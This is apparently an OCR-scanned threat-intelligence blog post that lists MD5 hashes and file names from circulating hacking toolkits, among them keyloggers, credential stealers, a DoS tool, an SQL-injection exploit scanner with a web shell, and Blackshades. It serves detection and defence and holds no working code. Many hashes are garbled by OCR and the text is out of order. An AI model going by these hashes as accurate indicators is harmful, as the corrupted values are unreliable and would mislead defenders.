ColumnNodeul.js 
7¢€622c881803992b7796dc37302555dc 
DataView-more.js 
bed121d56cba5170c03cedde6a04d0c9 
DataViewTransition.js 
56efc1c56727f9d36f912f80b7fcf782 
FieldLabeler.js 
9566f87d283f77b4fb21c3ea369fb247 
FieldReplicator.js 
24f06aa675c1f5ccObeb2d4ade82d2f0 
Focus.js 215f5c6f79ca21417036901c27480791 
GMapPanel.js 
137a47505f7b8ee12765862ab53c5edf 


GroupSummary.js 
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4e375eefelb67159c6c32e3f250de97b 
GroupTab.js 
d13ddc2e02101a6ab8c8086752a55953 
GroupTabPanel.js 
860b152d1158c8bd1ff5c7001aa55a25 
ItemSelector.js 
1b9eff7bd6b450dbe19a430811b62fel 
LockingGridView.js 
708a19e900916c357b71ed5df78c9Ff99 
MultiSelect.js 
c7e8f80abflaeddd467df50fa41b830f 
PagingMemoryProxy.js 
455ab8f8cfcec799de69b84a8652dflb 
PagingStore.js 
1a99737e573e6744126864520f221117 
PanelResizer.js 
11f2f79a152ad24f26e3406642738fbe 
Portal.js 
d9d63220bd9ecfed6088afd6c47e7560 
PortalColumn.js 
ea10944de38a8c06c2979667a422e19a 
Portlet.js 
ab85a588c51d100ddflbdlef6c735931 
ProgressBarPager.js 
db28d528e5c8bd81d213704458d35e8b 
Reorderer.js 
e974e46f0369df22acal7cd7aa21901a 
RowEditor.js 
e1390ca1670a344a8d851a8c184347d7 
RowExpander.js 
564546661e7c877a250537cf2275692f 
RowLayout.js 
dd78448072908987c3c1fb106f4794f2 
SearchField.js 
275fc305c360b12bbf227873e108707a 
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SelectBox.js 
985ae997465f7febc08ed41375fc5de3 
SlidingPager.js 
bc8e9c6d2a317f8112ba4a74de22d16f 
Spinner.js 
e€159d592b8da87be0f0515bc6f37abac 
SpinnerField.js 
9077b9b0b8759a102db223da30b293cc 
Spotlight.js 
9c943529f8b40cb67114ccOacc8c99ae 
TabCloseMenu.js 
135fc766d3cf4c8d2781597d43903a12 
TableGrid.js 
dd2f88a2ab7116407c7a595770cdc4ab 
TabScrollerMenu.js 
e€29462dc7522558474980e9cac35403a 
ToolbarDroppable.js 
969baeae3c0018c2e69f25c6a12014c9 
ToolbarReorderer.js 
4a6b24e1f6b436e9fd52c215220d2b43 
ux-all-debug.js 
6d716ea373ccfl3cc889dbd9e8ellea3 
ux-all.js 
34a735bc6776411e942533173ac6d533 
XmlTreeLoader.js 
8f4893b609806f8e4b74c4344e829d99 
CenterLayout.css 
15873424bfa134d8a8183148e7bb2a58 
ColumnHeaderGroup.css 
912e4eb991395a75c076a2e402e8717e 
ColumnNodeul.css 
2ed7bf7f3d301db9972fbbbcc877cbla 
GroupSummary.css 
8e7d0409d87ela70cOae5ccb2d9fac9d 


GroupTab.css 


11061 


f69355cb1a2c6a22e13bal4f4109e965 
LockingGridView.css 
5de00cc820a7d741d8e248879bf26fad 
MultiSelect.css 
c78c5bb8ed01ad800b992110ca5555b7 
PanelResizer.css 
a06elccd4dcb7b2b0dd6d39dcff69c74 
Portal.css 
4a6af230309bc077b5d90952218919f0 
RowEditor.css 
1237943e1a9d34adea4ab14410ffdea8 
Spinner.css 
105ad816f02c80514e6df826814799bb 
ux-all.css 
513e12c2138a20d883d712aa9dfe2096 
FileUploadField.js 
572d19b1de7a9ec09e61d16123e79757 
fileuploadfield.css 
06d497a4d0830ed2f0cb136e8dd671lae 
GridFilters.js 
901fdc73b5094523897729839bff2b87 
GridFilters.css 
45e5db3d85cc3c601dd205416f4bf3f5 
RangeMenu.css 
ea7f9fcbe439101586a3eb02c4dbe2b6 
BooleanFilter.js 
c9ebba83487da47e6cf5d6acb2016152 
DateFilter.js 
d354aeb339cbfc6e6fb900a0120d4f75 
Filter.js 
0b88dc766bbccb770e41745542b9dcb6 
ListFilter.js 
f56025561909d9c4219d3b55968flea7 
NumericFilter.js 
0246401eef119fd4163884274b80e80e 
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StringFilter.js 
5966be11a515501649c1d8ff0381f282 
equals.png 
87b7eee501232f65cc27db5c5dd4694a 


find.png 9flca0cb69861e19aacb41d097adc081 


greater _than.png 
746cb720e5e18bd8c52cldbfeaaa4cef 
less _than.png 
2fb7416c89137c90bd94798dd598da05 
sort filtered _asc.gif 
9e7aa77783ea8aa38075d1385b3fa059 
sort filtered desc.gif 
6d594504e046c5f2bdad39263dcd3656 
ListMenu.js 
€1b4897409ccb500d50c5da35cf1f188 
RangeMenu.js 
1b686d57cb1d8679fe548789995f8180 
bottom2.gif 
773247aaf09b8c0251e45f5470939b30 
down2.gif 
36e1a1678e32551ac96a05de48b370f4 
elbow-minus-nl.gif 
5ed5bffbal57eceee7989db95b919e4d5 
elbow-plus-nl.gif 
fOf50cOdd3ee6dd4b11c1f245b36eb01 
left2.gif 
ebd0dcea71665d3d9684602c905c4fe7 
panel-handle.gif 
96ddde86fd08fd6a091fo1l5fdec75ad3 
right2.gif 
78b4952296f04977909512181b0e3316 
row-editor-bg. gif 
109bf096907f4bd4f6b7cd5b6477c756 
row-editor-btns. gif 
f43e4029190calb0da745c2266c07364 
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spinner-split. gif 
d228e63edb4c53c58da4065e241a0d19 
spinner.gif 
7732a49¢954f7c297410bbbe49abadb8 
summary-bg.gif 
84ff0aa496593b0301b1424bcbf1537¢ 
summary-group-bg.gif 
850cfa2a46bc72d27b36714c606e5738 
top2.gif d5c29f6ff86931ff44142804f357a34b 
up2.gif 
1a118109ad72bf964acfd8d3ce37cd3e 
x-grouptabs-corners.gif 
97d9df3318e1397f63eda201b1b3b185 
StatusBar.js 
e4e4b704edf2d5c668ee4aal16900a8a9 
ValidationStatus.js 
4e2a94fc5b5965202eb2fe01e93e6al11 
statusbar.css 
1b954458b18557bd1d101499e3d4f045 
accept.png 
8bfed48756f192ed7afebeaa4799aae4 
exclamation. gif 
37dbe02e3cbde0f6780650bfd8535e38 
loading.gif 
00ef871b291bc03a497d608a5bd8ec99 
saved.png 
€9b528b9541e127967eda62f79118ef0 
saving.gif 
ab38acb4e7bd7f805eea06948aaadal2 
treegrid.css 
1195025ca5c72f3f62d562e6c52546ff 
TreeGrid.js 
5efc597301d5564367191b6a03d89815 
TreeGridColumnResizer.js 


7e2ad187d0ccead310b420f6ec83fe69 
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TreeGridColumns.js 
20d0dfa1l7b8be0b9c761c61bc50f08c7 
TreeGridLoader.js 
64796276bf316acc99dacb8ceaeaebb4 
TreeGridNodeul.js 
ec0664606110e84b7826d8bb4f1c1e46 
TreeGridSorter.js 
€54434395fefcbe04fa46fb97be00de7 
Unknown DoSer release[ SUPER].exe 
4f3782e2f6f8daeeb7cf7957d60b8044 
Credits.txt 
55c4c6c2224ccd2d37bbbcf170ab708f 
Read Me.txt 
27ee03f23d725356d3a500cac9cfc759 
The Unknowns - Quote.txt 
f321995d6a0617c27a340a6c99670fa2 
The Unknowns.png 
77bafoc5927d22c3fa4c4d8750b884a8 
Thumbs.db 
7826c4fc0d9d15a28a775865d1c27263 
Unknown Logger V 0.7.6.sIn 
539aa8f50ea8162b220fc6d8c921b3ec 
Unknown Logger V 0.7.6.suo 
f50c487dc5d9478deala151b1f740f36 
Component1.Designer.vb 
39decal1769959b10256d6d96771lale2e 
Componentl.vb 
7f2e6df9e93e32770146cd7b1f4fab26 
Form2.Designer.vb 
28755dcc2ffde410cf03573326eafcd8 
Form2.resx 
5aelle5f49dec3da6676204elacf37f2 
Form2.vb adabac9d7b764204e47f7d894e40e071 
Form3.Designer.vb 
bf16284f53e5616087a2e6849c95da79 
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Form3.resx 
b7effd84ee9b378c82e6ce6747f827f8 
Form3.vb 478f548f94c16436bc248755e9565368 
Form9.Designer.vb 
810d7f3a032ae3423fdbaf30c3cOdf52 
Form9.resx 
b0e56604965296fc6e2e6c154789dfbf 
Form9.vb 7d8e5d17e83c73819481492c769de089 
Thumbs.db 
ealal7e47cd26426e6b3fb20fb6a3572 
Unknown Logger Public V 1.2.vbproj 
b2b8e2f418f8d078556761b6808cff90 
Unknown Logger Public V 1.2.vbproj.user 
02816bcclda4abf7ab716035d355eb7c 
Unknown Logger V Public.Designer.vb 
ed65dbba998bd4fcc7cccefb6cfebd8d 
Unknown Logger V Public.resx 
b5dff9759183d6ea26c21f5052c7b5ce 
Unknown Logger V Public.vb 
a15393bfb3b1e26f808d62ca17c625ef 
Unknown.ico 
57b041320bb48310ed4d022f6ac56bdf 
Dissembler Lib.dll 
180089220297d8eaa51b6e125092ecla 
name.exe c16e045199c94adaf7068a76544382c9 
res.exe 
66064dbdb70a5eb15ebf3bf65aba254b 
res.ini 
1b01f5eb5ea9ad78598d53baefa61e74 
res.log 
0c85c7a6976b68bf06F7b3e34b922dba 
Unknown Logger Public V 1.2.exe 
10480f341f89d2e4fb65f3f3b4b5288b 
Unknown Logger Public V 1.2.pdb 
4e80e52a35bf4aea47b7c206e60cdfe3 
11066 


Unknown Logger Public V 1.2.vshost.exe 
O02be6d33bledbc61c79882d3f556bd8a 
Unknown Logger Public V 1.2.xml 
a0b16acc313775592328b222eb322f13 
app.manifest 
e0c7db168b7a36d7e594e4233f59d312 
Application.Designer.vb 
ecfd1d137f2764acd0b12ac939170dc8 
Application.myapp 
fdla7f31be727a4693eec1090fbfeffe 
AssemblyInfo.vb 
c€2f28516395b658781589399836a9cC74 
Resources. Designer.vb 
ab0c23e89d3793479537d65f1716b736 
Resources.resx 
48fb7e3272b100c6c8800e443f27aa52 
Settings.Designer.vb 
85446d4d08746e4939cf28103e814d2e 
Settings.settings 
4a12ce12282d0ee237b12e7513037c50 
DesignTimeResolveAssemblyReferences.cache 
750e659b679e14be92d396ccf2f58939 
DesignTimeResolveAssemblyReferencesInput.cache 
68c0bd5452a33bbc2e69140d58213ebb 
GenerateResource.read.1.tlog 
08dcc269f6480579260d02183d35764f 
GenerateResource.write.1.tlog 
284612a36d4cc3801163aadad06c4de0 
ResolveAssemblyReference.cache 
Ocde593d7b/7ffe7f75c8563f7814fd2c 
Unknown Logger Public V 1.2.exe 
c55b166f1a43d66325e26271aebc6678 
Unknown Logger Public V 1.2.pdb 
46a544689a932d4d196939a5ebad35f5 
Unknown Logger Public V 1.2.vbproj.FileListAbsolute.txt 
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bed6523187ff43788dc52d02f65c048d 
Unknown Logger Public V 1.2.xml 
a0b16acc313775592328b222eb322f13 
Unknown Logger V 1.2.1.exe 
b3d4a53dd49ddcd6e9c1478b25a509d7 
Unknown Logger V 1.2.1.pdb 
33f77b921416da37elef42acb461ae42 
Unknown Logger V 1.2.1.xml 
1dcb052376f26b503b9dbc0151313524 
Unknown Logger _V_Public.Form1.resources 
dd6d77d59063951c8741d54094e43ec1 
Unknown Logger _V_Public.Form2.resources 
2b01018d69cbf097937c751acf6a2794 
Unknown Logger _V_Public.Form3.resources 
2b01018d69cbf097937c751acf6a2794 
Unknown Logger _V_Public.Form9.resources 
2b01018d69cbf097937c751acf6a2794 
Unknown Logger V_Public.Resources.resources 
e€6c8c53b9d244c09318cc462adfb58ec 

My Project.Resources.Designer.vb.dll 
Odf77b7ed9115d4312d0bb652dc5cdc7 
build.force 
DesignTimeResolveAssemblyReferencesInput.cache 
50cd5e364b1c54b2fa8f96442f47638c 
GenerateResource.read.1.tlog 
2d01c4bce37dc6e4725c8d2d4be9faa8 
GenerateResource.write.1.tlog 
98b5032ee83d052431f1159a8a9Ff202c 
Unknown Logger Public V 1.2.vbproj.FileListAbsolute.txt 
2ea6a5bca40447b1f2felbda335b306b 
Unknown Logger V 0.7.6.exe 
99cb4a708afdf29e79654583b7ba7da7 
Unknown Logger V 0.7.6.pdb 
ede1b0d12b271a127a305a048ea490bc 
Unknown Logger V 0.7.6.xml 
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d30b46613e4d7c5ab99dfe98albff111 
Unknown Logger V_Public.Form1.resources 
dd6d77d59063951c8741d54094e43ec1 
Unknown Logger V_Public.Form2.resources 
2b01018d69cbf097937c751lacf6a2794 
Unknown Logger V_Public.Form3.resources 
2b01018d69cbf097937c751acf6a2794 
Unknown Logger V_Public.Form9.resources 
2b01018d69cbf097937c751lacf6a2794 
Unknown Logger V _Public.Resources.resources 
e6c8c53b9d244c09318cc462adfb58ec 

My Project.Resources.Designer.vb.dll 
d773f95950fb00057045e2b9aae3da04 
Res.exe 
66064dbdb70a5eb15ebf3bf65aba254b 
Unknown.exe 
ac2a341898dea2822eefd3bd96c26bf6 
App.config 
ad659ec22cfe6cba704eb7eaf54fe721 
CIE7Password.vb 
9622aa29c24e7442dca71a17d40d64dd 
CIE7Passwords.vb 
76360a1a3b6531f2a3186c3a70ffclde6 
CIEPassword.vb 
f4823d9991d9e694edf43717eabdd518 
CIEPasswords.vb 
1d032b65e43de2165ae8afb79delcf45 
Cltem.vb 44d5d8c1dd661207c7fbc49812d10a16 
Cltems.vb 
c100f6c0d41791b9496076d88f6d433d 
ConstPStore.vb 
08bd220d6440a0e7fab80139c470a276 
CProtectStore.vb 
c12168d45c07349bee2e0f84e0ecd516 
CSubType.vb 
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2833004d54d8b5b37db4c02a4f864707 
CSubTypes.vb 
€98454150626f73741e48513ece5a576 
CType.vb 7b5ae4cd9090a7835d269072073bf5b4 
CTypes.vb 
1566a8401b78a393c693573b9d32073e 
CUtils.vb 
4864682a35ba93ecee12f7548120474c 
Form1.Designer.vb 
a8b72d72c43968f49a9bd5a3alaf7c41 
Form1.resx 
9d29c863703979523d99aac151e68411 
Forml.vb fd16b4ff2fad92b27e33278577580173 
guidProvider.vb 

7cOafad6985 7affc20e85647712cc7c2 
guidType.vb 
coc5cf2e5ad8efle43cbdbc671f759c7 
lEnumPStoreltems.vb 
ad323e0a47faa639c9cab95f66280539 
lIEnumPStoreProviders.vb 
98a67ca34819f2893d938572d748501a 
lIEnumPStoreTypes.vb 
52633a61f5e3372f121d67dd6lefba0a 
IPStore.vb 
fadff2e325774c7264b709590b4dd7fe 
Keylogger GUI.sIn 
65f7e236111c07e94e9ae7a7abb68ffd2 
Keylogger GUI.suo 
0e7b6a32d7c3c78052e9f00d4265823f 
MSN Class.vb 
€9071b919996aldf498fca3345a006bf 
MSN Get.vb 
c939e151dc29ef3ecc44565a2af09b60 
PST _ACCESSCLAUSE.vb 
e610fc92e8e26ce6b58c6b66341a92c2 
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PST _ACCESSRULE.vb 
e8f375732516a165039de21c6de57c99 
PST _ACCESSRULESET.vb 
bca583b62db20812afe7ffe04b267eel 
PST AUTHENTICODEDATA.vb 
95b3f9c5b476b4864e0b1b1ceb74827d 
PST _BINARYCHECKDATA.vb 
d886b0e0c5ca5f0eb289ad28bccc792d 
PST ERROR _CODE.vb 
ae3434d4b13ad4d2b84a93fed275fa35 
PST _KEY.vb 
16747a128b0a81dbf81le8cf578aalcd1 
PST _PROMPTINFO.vb 
29338ba6941988b5e85aaec4b5aedacO 
PST _PROVIDERINFO.vb 
2e74370f3fcb8df4edb871085bc2bd94 
PST _TYPEINFO.vb 
lfoffcdbac8370f14957f435455a91e3 
Sql Hendler.vb 
25a122a06b4372d5d30119c0b0ee557a 
Unknown.vbproj 
9722decdc2240c387fd8aldd97e502d1 
Dissembler Lib.dll 
180089220297d8eaa51b6e125092ecla 
Unknown.exe 
ac2a341898dea2822eefd3bd96c26bf6 
Unknown.pdb 
0d45cOde2ef08c29df1d40f15f185360 
Unknown.vshost.exe 
be758b90df515250ba0e01c1395b5de7 
Unknown.vshost.exe.manifest 
a19a2658ba69030c6ac9d11fd7d7e3cl 
Unknown.xml 
860d7b4faabeeabaef80c25a07b00056 
Application.Designer.vb 
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09fab3fb3f577e0159f85e4c2339d2al 
Application.myapp 
8d39b4af3f919328612b64fcbf5d1b8c 
AssemblyInfo.vb 
e325ae11274c9d14cad78671dc5faf87 
Resources.Designer.vb 

3643546869122 7ffc39c4df6élale2f0d 
Resources.resx 
fc75f378d77f29ee452970be2bf081el 
Settings.Designer.vb 
bfeb20f0f6b9846f3d661b6e4250dec0 
Settings.settings 
4a12ce12282d0ee237b12e7513037c50 
DesignTimeResolveAssemblyReferencesInput.cache 
aab4f56a7dc6f79al2ac4b36950bd500 
Keylogger GUI.vbproj.FileListAbsolute.txt 
2fa244a95ff5144059cb8958b7fbdd48 
ResGen.read.1.tlog 
afb07eabf3a284ede755c4f610410bc3 
ResGen.write.1.tlog 
f5959838402dde513dd8dc46f449083b 
Unknown.exe 
ac2a341898dea2822eefd3bd96c26bf6 
Unknown.Form1.resources 
d85fe5b9a2e22066b1d7dc89c16ee527 
Unknown.pdb 
0d45cOde2ef08c29df1d40f15f185360 
Unknown.Resources.resources 
d85fe5b9a2e22066b1d7dc89c16ee527 
Unknown.vbproj.FileListAbsolute.txt 
09aa8823a6b588468ccedab6d420f440f 
Unknown.xml 
860d7b4faabeeabaef80c25a07b00056 
My Project.Resources.Designer.vb.dll 
ca096b2b8c3a457db3d1f3fc620fc678 
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dork.txt 9bc810f29c17d7cd24755c2f13d62e4f 
Mscomctl.ocx 
ecc7d7f0d3446de36045d1d9e964fafe 
msinet.ocx 
b920865c9c2f4f28151b269b3a8b11laa 
Readme.txt 
b811e053ebb5508ad901f694f4b2ebcc 
shdocvw.dll 
056ef846cbfd487a5f56f27db400bdee 
SqliVulnResults.txt 

tabctl32.ocx 
908938d3ba2d870ee9fc6238a4cb6af95 
websh3ll.txt 
0540573b4fb10aff58c3883f62093d96 
XCodeXploitScanner.exe 
f8a74564c2cf322bf93013727ae848a2 
dork.txt 9bc810f29c17d7cd24755c2f13d62e4f 
Mscomctl.ocx 
ecc7d7f0d3446de36045d1d9e964fafe 
msinet.ocx 
b920865c9c2f4f28151b269b3a8b11laa 
Readme.txt 
b811e053ebb5508ad901f694f4b2ebcc 
shdocvw.dll 
056ef846cbfd487a5f56f27db400bdee 
SqliVulnResults.txt 

tabctl32.ocx 
908938d3ba2d870ee9fc6238a4cb6af95 
websh3ll.txt 
0540573b4fb10aff58c3883f62093d96 
XCodeXploitScanner.exe 
f8a74564c2cf322bf93013727ae848a2 
commentsswedenorganismen.txt 
8b98ab0037c419ela8fcc116eb4827fe 
Google.GData.Client.dll 
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ecbdc3d8fea156667ff610dac43b308b 
Google.GData.Extensions.dll 
aafc23af42815137a7f6344d7ae3c1b5 
Google.GData. YouTube.dll 
cc9e31fb685612972d7c828dcb267ff2 
proxy.txt.txt 
481labe39d8fbf314c9cbf18ee7f5cf60 
ReadMe.txt 
e9bb502dc983d59e8d468elfef33d59b 
YB PRO ToS.txt 
34850ca0bca0fadc4980293flaf6a494 
YouBooster PRO Edition cracked by DarkCoderz.exe 
bc8268afa2439e0085b5c6eab070b6b8 
Stay tuned! 


1. https://1.bp. blogspot .com/-—0_MtUCS_Ulo/X9SLGcBMSYI/AAAAAAAALPg/Q8dqxF c8vboPKkHNpPF6dYQsVWYWNt J 1wCLcBGAsYHQ 
/s511/Misc_820. png 
2. https: //ddanchev.blogspot .com/2020/12/exposing-modern-client-side-exploits_23.html 
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Dear blog readers, 


This is the fifth post part of my "[2]Exposing Modern Client-Side Exploits Serving Kits - An AV and 
Snort IDS MD5 List Compilation - Part Four" blog post series where | intend to share actionable 
threat intelligence with vendors and organizations with the idea to assist them in protecting 
their networks and the networks of their clients and customers. 


In the fifth post part of the series | intend to provide additional MD5s for some of the high- 
profile and currently popular and in circulation hacking tools with the idea to assist vendors 
and organizations on their way to properly protect their infrastructure and the infrastructure of 
their clients and customers. 


Sample MD5s for some of the currently active hacking tools currently circulating in the wild: 
StealerPro1ll.exe 
306c8238af14e165a7f49cecle934265 
Screenshot.jpg 
24de24caf8ef34295456d9b44d3faa91 
1337 SteamACC Stealer Private.exe 
e0a4b559ece736a296ac46f718d4f3a2 
Blackshades NET Setup Tutorial. pdf 
5b73cc2ba69f315230844ecae78b3c4e 
Blackshades NET User Guide.pdf 
7753e25cclafalbebce1d9264b17e098 
client.exe 
3164551671b3ae3dba95f0e5b1ed5139 
client.ini 
9834fea3a6d660b84560dd6a3ee53a21 
LoginServer4.8.exe 
afle471c85b43bdc483cb2041b586e53 
Read Me.txt 
cb7a918831e9945571dc16d418177796 
version.txt 
717fae4bc5562a141572b67cbe371224 
Codejock.Controls.Unicode.v12.0.2.0cx 
ec08be364fd4ec034597200c42c04b0a 
Codejock.SkinFramework.v12.0.2.0cx 
d6901189ab414fea205efcfde159b021 
CODEJO 1.oca 
928ab3d2ffe0944b9dd8bd648d7042e5 
CODEJO 2.0ca 
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25f7cc50f4bbf81ff82c243f20cde0c7 
CODEJO 3.o0ca 
d9b7be0edb184e01e7725e277324al1e3 
data. ini 

fav.ini 

IPList.dat 
06ff3d8a37ff4517ae89e5b156f21563 
MSCOMCTL.oca 
7d4ea62248dd931880abd8df82acaa3d 
MSCOMCTL.OCX 
774a15583db1ad44c5ee32309c840c96 
MSDATGRD.oca 
639e1c29b0a779db7b0b7e7e293ba8ab 
MSDATGRD.OCX 
fa8de5f76ba59bc4190fde2c78401d40 
MSInet.oca 
b8a3f183d660a8939c784b09ce24b5ab 
MSINET.OCX 
7bec181a21753498b6bd001c42a42722 
mswinsck.oca 
48271b2c60d46965bdcaddd7282ad528 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
0a107bbf1l38aaac2daeac73cb56f1e00 
RICHTX32.0ca 
6bb44a77e742d0bbfbbe23217a46ee80 
RICHTX32.0CX 
eb4a8f35a70a887fe32f43a3aa7d4e9a 
station.bin 
3f761689balaeac703ae30db8df09dad 
stub.bin cce62e727d2fe7a84bd8f3107206bbac 
upx.exe 
bf1b3a4559e250e0fad9d7c138020982 
L.gif 
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683f5e1bcc3a92410c980983b10d13cc 


10.gif 
4a7b2912f159062c30a50347d181fe70 
100. gif 
6c446f42ec0da49fd10c839ba20e2e63 
101.gif 
c3741a13c68e380bb05d41e6b29feae9 
102. gif 
da6f0195c6594cb088b09e7b07420945 
103.gif 
f69713c9c4ac1460a155517c8f2e8b70 
104. gif 
2f1ad5a7035f3bc92178f7d15a9affed 
105.gif 
d46190d6139ee5e4222194af3d642188 
106. gif 
72a821068409fd0ea796b67355982d99 
107.gif 
al1412bbb7e48e1c195e64aadde8328fb 
108. gif 
84189a1b08c5f722be99b16da84d9786 
109. gif 
d6363bfd8f230130db77elecf99417e4 
11.gif 
bbbf223861d1bd48a09229562db61276 
110. gif 
fo1a8d4a6e3159d57a47d1aa5a569e06 
111.gif 
9d39fb34bc9519bd8f2d90a9151839fc 
112.gif 
a66f7313717368e657ald5a29deafcde 
113.gif 
ea03aeceeb97a268f22a907af5483edf 
114.gif 


f99c5607b0589cdfa64a602d0c185662 
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115.gif 
a3afd015d3081ed7bcd09bda2e6b9631 
116.gif 
84be4b9b650a29af4a1196a16049130c 
117.gif 
ee0538cled0a23e838b1cae4ccdf67ad 
118.gif 
9efaf3cf2ca0c5fb5fe889c7974e246b 
119.gif 
adOfadf4bf7595606d0b1ff596790b10 
12.gif 
afd00e1432935d39c6fcbbe4a75afb1d 
120.gif 
41e20f0b1984a737cc3eld5a7af485dd 
121.gif 
a29e28c42e6936c160b2bdb7d7ccl1a26 
122.gif 
ca051f77d62b0e161f41f580f3d94387 
123.gif 
fbee49d578ccac891lecb3f9d7924fea7 
124.gif 
40e25159bd20b6cfd04b9147feb948fc 
125.gif 
a3c2e7ef8bf259459c98310737d6f73e 
126.gif 
a938bead58df6e461f5b8e8aca7fd86F 
127.gif 
776a8a1522b9ef3a7da856ce9199f072 
128.gif 
170d7061lad5c3f7d9e20ece655c0lae7 
129.gif 
798b0d92a697e1c3f6ab72e16b73f3d3 
13.gif 
2allcaaa66debd78a982b14ef5190371 
130.gif 
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91936df2211679277b0b6484636fd922 


131.gif 
073da4142dcd4fe021b42b39e6522ca5 
132.gif 
bcd450500a9cc0a755ad74aa47347ac6 
133.gif 
011e0c12782613458eff8f272b0a69a2 
134. gif 
92b294a8079db7b0633c8dc991abf8c3 
135.gif 
6c4892982fded2195f45b9ce3dc909b7 
136.gif 
57a862cc48674b6d78313a708314b1e9 
137.gif 
2285cebac842ed75edc950a69dddd48e 
138.gif 
822efc8a5921a6ca281ef1405fd4a303 
139.gif 
aal6ccd82f0302b2d7d5fd798f501759 
14. gif 
f5c96a8b759141c514798d6e7bla2cle 
140. gif 
6bdef28690e84b0667ebac75b6535319 
141.gif 
94f4alecf4095adbacc8cb69222394bf 
142.gif 
f45453308e7d319falfac4b517860185 
143.gif 
d19bee38077187409df3c6defb2ed7c1 
144. gif 
486939a940cf9546207fd9cab1lec028 
145.gif 
e€078d3c54770b77ce14075bdea7a2c65 
146. gif 


fe0a52298daa007dcbf07bf2ac3a4ebe 
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147.gif 
496150a2f7e732bddfb9db27c6ac86b1 


148.gif 
3adf35995fade25bf2270eae18a20b31 
149. gif 
8ddfffb865ed49147610a9d72becf645 
LS:Git 
c1695alac94ee817cc3c6f5b0eabb8a3 
150.gif 
ac295725695e2f4216e60f983916785c 
151.gif 
54784ff863c5103f577e5d40689f857d 
152.gif 
b87flcc3ladcf84dd9b1a29933615d42 
153.gif 
2bfb51d2dd268fe670204f3ca799294F 
154.gif 
06b21cea1408429699844675ff6cf4f4 
155.gif 
4c3fcf6b87b2971e57a0bc29f29d9c Of 
156.gif 
fc8be017b7be2b1097b53362c05433fd 
157.gif 
5f9a1c9474fe8b0d73cd8c7e8a654502 
158.gif 
917420325a2125019133646ce5da3996 
159.gif 
3a33clae7160e3414cf57cef922f0b7a 
16.gif 
7a83ad25cc22054dc45db94922a028d3 
160.gif 
c1f68d3530b23d6c7efb6c25beac30e5 
161.gif 
d4e88c3a9ac6bfodebf6615037fa83bc 
162.gif 
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01ce4368b0c04b7dd13d2e39e9654b12 
163.gif 
51c4b742afe0f210c9e2f8a8dc2417f5 
164. gif 
e57171a597cd1860c061d5dcc5ca5f94 
165.gif 
943d1544c63ea24a7a9fa563e394e8f8 
166.gif 
760545a0e29d6939fd66e5de816c48aa 
167.gif 
68aa6c275d0e70c9c7dbac7a32600926 
168.gif 
003bdf03cfce865c94d486418004ae2d 
169. gif 
7ebd99c5fde9alf3a4d0f9690fObF9I69 
17.gif 

c2c0e4c3e93a7 7fa519c9f2da280f072 
170. gif 
bc398c1f9f9063d79a09eef6303F2249 
171.gif 
2152321a43f036b174344944ab018bf7 
172.gif 
2294f61d08796bdf7ba6a3701bb2ede8 
173.gif 
f17f549f8aa8285dd77e8f21c65bdca6 
174.gif 
a9d6fa6d6c7ffd1f334bbe7615c06778 
175.gif 
52a80bc55141c14f6ee0fe691d6d4f10 
176.gif 
b1b2d78727fea095b474045d0d3ac4b2 
177.gif 
ff3feOd5ad0faa04edf6dbd2c6fa071c 
178. gif 
b3e88c83c500f792bdafel9alf96b4f4 
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179.gif 
a08c4af6f90264f6a1157574e1f047e2 
18.gif 
€858ab7239b8015a83f5f897 6ffcf34b 
180.gif 
8b13bfa55cba7da3fb081e23c8234b2b 
181.gif 
299ba9f3ff06d5035585a831506ba7d7 
182.gif 
5e511ded1b09d5bade754adc257365a2 
183.gif 
3ffed0774932b3c5041ladbc9elb2ec36 
184.gif 
5fla8f7966df53a5c7f5ff15c7152e4a 
185.gif 
838c5dc7446ec7bb03bbe4890b4f89ce 
186.gif 
afdbc5a8d816fa992f84d802bda62516 
187.gif 
964b1b05eb711efc321da8360a602a00 
188.gif 
638b2c41113e5edb218f687f814845bd 
189.gif 
€64429e4c56967ec0845f26ff92ca0c5 
19.gif 
6c526de7f2c479393bd95a0ee3f55b6b 
190.gif 
O0f660689bdd44d5d94e4a95f6efb28e1 
191.gif 
ddf9dde996532c403679e9111f93afb6 
192.gif 
cdb02ebe150ac16254bd1dca6ba91fdf 
193.gif 
58b51e29c2633fbdf2f606dea51544d0 
194.gif 
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c2bad1fea70127ed5acd4d8176c65e1b 


195.gif 
43f3005242faf3d8f666817d4dee7adf 
196. gif 
da69f9e5639afd2209a8f68eb055211a 
197.gif 
a370b2268fa2b5daa752bff6a90c818c 
198. gif 
3a58dac9e942eb63c3ellae9eca02215 
199. gif 
a9fe96ef930760e5240c7ff219c25cac 
2.gif 
7baa4d8ae6727497c7ba02570d812656 
20.gif 
a787f111lec85b9cc9e1c60d55fcffcd1 
200.gif 
dde91b09b11ddc00817c873fb8f125a5 
201.gif 
7487e1f30f5aff072116e64eflda8b0e 
202.gif 
038e6a6849d6df2731704d697d44f0f1 
203.gif 
98b14b496ad57f08ed310f16bc0da6b4 
204.gif 
c1f68d3530b23d6c7efb6c25beac30e5 
205.gif 
7¢cd885c46477cbc0e2e9122787fd77b3 
206.gif 
bdeed604086b1ee8b5129802c3770049 
207.jpg 
3930e8dfe8804ab4a6edebadd802cal6 
208.gif 
3¢€337240892c0b59f6524c0580d5b630 
209.gif 


8fec4d24eb3d71e0377c3912eed33822 
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21.gif 
88bd2077127169fa0d7cd77a38b4388c 
210.gif 
f92865ae021d63e98249b5745522f033 
211.gif 
539a448d9574c901afec3f121bd2be09 
212.gif 
c2601a065ac808e9fd25b2f3e4519dc9 
213.gif 
c5laaf546fc83d603adb4b0d23a88429 
214.gif 
87fe09d5f56d11672aa8b01ff60dea25 
215.gif 
bb44946aef5cea20f727cd33d25b2db5 
216.gif 
5fa13370878c968bb40c061b0406da98 
217.gif 
5alf0e9bd3ad9ecec55fd90bfd5cc8e9 
218.gif 
92492e08fd6c1lcac231dbebd52b28427 
219.gif 
4c62eadb516e9d3f96b2c97f3e315570 
22.gif 
c673c12cea111092270cd20flde19c7c 
220.gif 
e6aa6lfefdl3aa5dcb15eb85d892af53 
221.gif 
f85abc007f66f242c7a32571da1645e9 
222.gif 
b7cb5f65f819c0a279229f0aba85aac4 
223.gif 
38d0f9e2e37b2924f58a520b8b139d39 
224.gif 
158710c512e2f3293a3958dabecf6694 
225.gif 
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3a8d5fe5cfd6bcfc71f4a983d2ffeafa 
226.gif 
be2b04acd7fée5efbdd75cbb1ba99296 
227.gif 
4c5bd3175f51bd00e39fdf9c7ddaae0d 
228.gif 
31b966a32f2b101d5c7e1569f6fab69a 
